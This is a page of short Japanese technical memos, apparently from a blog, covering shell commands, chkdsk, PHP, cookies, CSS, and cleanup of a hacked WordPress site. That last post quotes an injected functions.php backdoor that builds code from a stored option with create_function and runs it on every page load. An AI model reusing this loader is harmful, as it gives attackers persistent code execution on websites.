【UNIX/Linuxコマンド】ファイル数をカウントする

ファイル数をカウントするlinuxコマンドは以下のとおり。
カウントしたいファイルがある親ディレクトリまで移動して実行する。
サブディレクトリに含まれるファイルも含めてカウントされる。

-------------------------------
find . -type f | wc -l
-------------------------------

コマンドの解説

「find」は、ファイルやディレクトリを検索するコマンド。

その後のドット(.)は、探索の起点が現在のディレクトリであることを示す。この場合現在のディレクトリとそのすべてのサブディレクトリが探索の対象となる。
もしここをスラッシュ(/)に置き換えれば、探索の起点がルートディレクトリになる。

「-type f」は、通常ファイルを検索することを示す。「f」を「d」に置き換えれば、ディレクトリが検索対象となる。

パイプ(|)を使って、検索結果を次のコマンドに受け渡す。

「wc -l」は、行数の集計。つまり「find」で検索した結果が、ファイルの数だけ一行ずつ表示されるのを集計して、行の数として数字で表示する。
ちなみに「wc」は、 Word Count の略。

windows7も動作が遅くなったとき、チェックディスクを行った

windows7も動作が遅くなったとき、チェックディスクを行ったので覚書。

IEやその他のアプリケーションを立ち上げるのに2分も3分もかかる状態になった。
HDDが原因の可能性も考えて、チェックディスク(旧スキャンディスク)を行った。
その結果、のろのろした動作が直った。

やり方
------------------------------------------------------
HDDのアイコンを右クリックで「プロパティ」 → ツールタブ → エラーチェックの「チェックする」をクリック。

チェックディスクのオプションの「ファイルシステムエラーを自動的に修復する」「不良セクターをスキャンして、回復する」の二項目にチェック。

「開始」をクリックして再起動すると実行される。
------------------------------------------------------

そのとき出たメッセージ
windows replaced bad clusters in file 12345 of name \windows\ファイルパス\ファイル名.


ウインドウズは、『\windows\ファイルパス\ファイル名』のファイルの12345の不良クラスタを置き換えました
(同じようなメッセージがいくつか出た)

bad clusters → 不良クラスタ

セクター → HDDに書き込まれるデータの単位。(たいてい512バイトに固定)
クラスター → セクターが四個集まったもの

チェックディスク(スキャンディスク) → ハードディスク上で破損しているファイルを調査して修復をしてくれる作業。

Unixコマンドでディレクトリごとzipファイルに圧縮する

Unixコマンドでディレクトリごとzipファイルに圧縮する方法

コマンド
圧縮したいディレクトリがある親ディレクトリに移動して次のコマンドを実行。

コマンド
--------------------------------
zip -r 新しいディレクトリ名.zip 圧縮対象のディレクトリ名
--------------------------------

オプションの「-r」は、ファイルとディレクトリを再帰的に処理する。

【PHP】file_get_contentsでユーザーエージェントを指定する

file_get_contentsでユーザーエージェントを指定する方法のおぼえ書き。
ユーザーエージェントで表示内容を振り分けるページに有効。

//この設定がなければ、UserAgentは「PHP/x.x.x」になる。
////////////////////////////////////////////////////////////////////////////
$context = stream_context_create(array('http' => array(
'method' => 'GET',
'header' => 'User-Agent: Mozilla/6.4 (compatible; MSIE 4.0; Windows 98; DigExt)',
)));
////////////////////////////////////////////////////////////////////////////

file_get_contents($url, false,$context);

参考ページ:こちら

文字コードのUJISとは?何の略?

たまに目にするUJISという文字コード。気になったので調べました。

内容的には、日本語EUC(EUC-JP)のこと。
シグマOSの日本語コード系で、UNIX化拡張JIS(Unixnized extended JIS)コードの略。
国際的なUNIX コード体系(EUC:Extended UNIX Codes)の枠組みに従って日本語のコード体系を組み込んだもの。

※シグマOSとは、Σ(シグマ)プロジェクトで作られたオペレーティング・ システム。

さくら、poderosaで日本語入力

ターミナル(poderosa)でさくらのmysqlサーバーにログイン後、日本語できなかったので、対処法のおぼえ書き。

実行したいmysqlクエリ
-----------------------------------------------
UPDATE table1 SET flag = 1 where column LIKE '%日本語%'
-----------------------------------------------

poderosaのエンコーディング設定
-----------------------------------------------
utf-8(cjk)
-----------------------------------------------

クエリをpoderosaにコピペすると日本語だけきれいに無くなる。

つまりこうなる。
-----------------------------------------------
UPDATE table1 SET flag = 1 where column LIKE '%%'
-----------------------------------------------

対処法を調べてみると、「.cshrc」に次の追記をすればいいらしいと判明。

#poderosaで日本語を扱うために追記
-----------------------------------------------
setenv LANG ja_JP.UTF-8
-----------------------------------------------
参考サイトはこちら

poderosaでmysqlサーバーに再ログイン。
すると新たなるエラー。

エラー内容
-----------------------------------------------
ERROR 1267 (HY000): Illegal mix of collations (utf8_general_ci,IMPLICIT) and (ujis_japanese_ci,COERCIBLE) for operation 'like'
-----------------------------------------------
※「ujis」は、日本語EUC(EUC-JP)のこと。

文字コードが違うようなので、poderosaのエンコーディングを変更
-----------------------------------------------
utf-8(cjk) → euc-jp
-----------------------------------------------

無事にエラーも出ずに日本語も使えるようになった。

cookieの値をjavascriptでページ上に表示する

cookieの値をjavascriptでページ上に表示する方法

javascriptの記述
---------------------------------------------------
// クッキーの値を取得 getCookie(クッキー名);
function getCookie(c_name){
var st="";
var ed="";
if(document.cookie.length>0){
// クッキーの値を取り出す
st=document.cookie.indexOf(c_name + "=");
if(st!=-1){
st=st+c_name.length+1;
ed=document.cookie.indexOf(";",st);
if(ed==-1) ed=document.cookie.length;
// 値をデコードして返す
return unescape(document.cookie.substring(st,ed));
}
}
return "";
}

// クッキーの値をアラートで表示
function checkCookie(){
if(getCookie('testcookie')){
var setName = getCookie('testcookie');
document.write(setName);
//alert(setName); //アラートならこっち
}
}
---------------------------------------------------

cookieの値を表示したい箇所に記述
---------------------------------------------------
<script type="text/javascript">
checkCookie();
</script>
---------------------------------------------------

もしPHPで処理したいなら
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
if (isset($_COOKIE["testcookie"]) {
//処理内容
}
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

参考サイト:こちら

cookieを保存する場合は、こちら

ボタンをクリックしたらjavascriptでcookieを保存する

このボタンを押すと cookie に「abc」と保存される
----------------------------------------------------------
<INPUT TYPE="button" NAME="button" VALUE="cookieに保存" ONCLICK="SetId('abc')">
----------------------------------------------------------

javascript の記述
----------------------------------------------------------
function SetId(strNum) {

var name = "testcookie"; // クッキーの名前
var value = strNum; // クッキーの値
var period = 7; // 有効期限日数

// 有効期限の作成(有効期限がないと、ブラウザを閉じた時点で cookieは無効)
var nowtime = new Date().getTime();
var clear_time = new Date(nowtime + (60 * 60 * 24 * 1000 * period));
var expires = clear_time.toGMTString();

// クッキーの発行(書き込み)
document.cookie = name + "=" + escape(value) + "; expires=" + expires;

window.alert(strNum + 'と保存しました'); // 警告ダイアログを表示

}
----------------------------------------------------------
参考サイト:こちら

cookieはこちらに保存される(IE11の場合)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
C:\Users\username\AppData\Roaming\Microsoft\Windows\Cookies\Low
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

cookie を開くとこんな感じ
----------------------------------------------------------
testcookie ←デリミタ
abc ←値
www.example.com/hoge/ ←cookieを発行したサイトURL
1600 ←フラグ
1888753024 ←有効期限1
30382331 ←有効期限2
1210506145 ←作成日時1
30380923 ←作成日時2
* ←デリミタ
----------------------------------------------------------

cookieの書式に関する詳細はこちら

保存したcookieを表示する場合は、こちら

【css】border-bottomがコンテンツをうまく囲ってくれない場合の対処法

border-bottomがコンテンツをうまく囲ってくれず、期待した箇所よりも上に来て、コンテンツ内容に重なって表示される場合の対処法。

次の記述を追加。

----------------------
overflow:auto
----------------------

divの間にfloat:leftなどを使っていると起きる現象である。
floatは文字通り浮いてしまうので、floatした要素しかない持たない親要素は、空っぽの状態になり高さも0pxになってしまう。

ちなみにこの現象は IE11 では起きず、Opera では起こった。

参考ページ1
参考ページ2

サイト改ざん後wordpressの表示が異常に遅い

wordpressのサイト改ざん問題が叫んで騒がれている最中、さくらから「おたくのサイトが改ざんされてる」と連絡をもらう。改ざんページの削除やwpのバージョンアップ等で対処したが、どうもサイトの表示が遅い。ひとつのページを開くのに20~30秒かかる。そのときの対処法メモ。

functions.phpこんな記述が書き込まれていた。

---------------------------------------------------------------------------
<?php function page_options() { $option = get_option('page_option'); $opt=unserialize($option);
@$arg = create_function('', $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg('');}
add_action('wp_head', 'page_options'); ?>
---------------------------------------------------------------------------

functions.phpの場所(オリジナルのテーマを使用)

---------------------------------------------------------------------------
/home/ユーザー名/www/公開フォルダ/wp-content/themes/オリジナルテーマ名
---------------------------------------------------------------------------

問題の箇所を削除したら表示スピードが改善された。
オリジナルテーマだけ再インストールせずに元のファイルをコピーしたため問題が残っていたようだ。

参考サイト:
 
 

18 / 30« 先頭...10...1617181920...30...最後 »